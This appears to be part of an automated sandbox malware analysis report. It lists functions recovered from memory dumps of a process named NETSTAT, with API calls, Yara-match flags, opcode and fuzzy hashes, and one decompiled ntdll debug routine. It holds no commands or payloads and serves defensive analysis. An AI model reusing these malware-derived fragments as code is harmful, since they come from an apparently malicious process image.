                                          • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction ID: c41f649d48ba77b760341ac8457f1ae6234b14e534c88d11d18304e992c63956
                                          • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction Fuzzy Hash: 8AE04FB12002046BD714DF59DC45E9777ACEF88750F014155FE095B341C530F910CAF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCBE0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BCDC62,00BCDC62,?,00000000,?,?), ref: 00BDCC10
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction ID: 7dbc5327f853a82c8332974a1cfc4248b28fe96fb7a392a392e4466cd805623a
                                          • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction Fuzzy Hash: C5E01AB12402086BD710DF49CC85EE777ADAF88660F118159BA0957241D630E8108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BDCA72 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00BDCAAD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction ID: 47d8f3f8123f0b66b7e24f66bfdcdf68ed05aa225b306ef1412dc4383a5b2cda
                                          • Opcode Fuzzy Hash: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction Fuzzy Hash: 11E0DFA81082864BDB05EFB9A9D08AB7B94EF423243044A8AE8D547307D130C85ACBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCE107 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00BC88CA,?), ref: 00BCE13B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 6f0d9ecaa9a0248e48b1feabb74878be41247f4ca94b5cff0d1fc0f869a54a91
                                          • Instruction ID: 5f1e72acd7dd2fc080cc36ba1f683d273baa0353278766549ad1027ee95cc8dc
                                          • Opcode Fuzzy Hash: 6f0d9ecaa9a0248e48b1feabb74878be41247f4ca94b5cff0d1fc0f869a54a91
                                          • Instruction Fuzzy Hash: 60E0C271240304A7EA109BE48C03F9572D49F45758F0900A4FD48EB3C3EA60E1114110
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00BCE110 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00BC88CA,?), ref: 00BCE13B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 985de137ac41ba15653d57465674028cf9154bf9b7056d838890ae7c9d812485
                                          • Instruction ID: 2bd8c5b393efd163aef0acfd1de29e7b08c0764d2886fd8e7745d428d5574dc5
                                          • Opcode Fuzzy Hash: 985de137ac41ba15653d57465674028cf9154bf9b7056d838890ae7c9d812485
                                          • Instruction Fuzzy Hash: 93D0A77169030877F710E6E48C03F5672CC9B48B50F0900A4FA09E73C3E960F5014164
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035D967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 691a3f85471adbe1417d4385b8423cae2914d2668ca100b2c3e8ff189aca502c
                                          • Instruction ID: 9a47b0cf293577a88343b7eadb82bc3ec82924d8b8d9da5ba4cee2983a606bf9
                                          • Opcode Fuzzy Hash: 691a3f85471adbe1417d4385b8423cae2914d2668ca100b2c3e8ff189aca502c
                                          • Instruction Fuzzy Hash: 5EB09B71A414D5C9D615D7745608727795477D0741F16C051D1060646A4778C491F6F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00BC4376 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3555672affcda21dc05cbca942d29a95e1b9a308f7b8b8df946ef1f875bbfc2
                                          • Instruction ID: ad545bb3961d2a3d27d07a93f8d10f9f2389c82550553f46fb68b8dc568dca21
                                          • Opcode Fuzzy Hash: f3555672affcda21dc05cbca942d29a95e1b9a308f7b8b8df946ef1f875bbfc2
                                          • Instruction Fuzzy Hash: A8D0C235A4614D8ECB114E0C78825A4F760AF0B104F0452C6DE489F213CA018414C2CA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0362FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0362FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E035DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03625720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03625720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x0362fdda
                                          0x0362fde2
                                          0x0362fde5
                                          0x0362fdec
                                          0x0362fdfa
                                          0x0362fdff
                                          0x0362fe0a
                                          0x0362fe0f
                                          0x0362fe17
                                          0x0362fe1e
                                          0x0362fe19
                                          0x0362fe19
                                          0x0362fe19
                                          0x0362fe20
                                          0x0362fe21
                                          0x0362fe22
                                          0x0362fe25
                                          0x0362fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0362FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0362FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0362FE01
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 3f3b653934eca753e21f649ec2946c7d4c2b0abba1fd87fc4594ceac0a099282
                                          • Instruction ID: 07ff87225bdcaf06de9c9fc55307d6254edcdcdae4d29e9b369cbebc59ca12a9
                                          • Opcode Fuzzy Hash: 3f3b653934eca753e21f649ec2946c7d4c2b0abba1fd87fc4594ceac0a099282
                                          • Instruction Fuzzy Hash: 5FF04636240A01BFD631AB45DC06F33BF6AEB40730F150314F6285A5E1DA62FC208AF4
                                          Uniqueness

                                          Uniqueness Score: -1.00%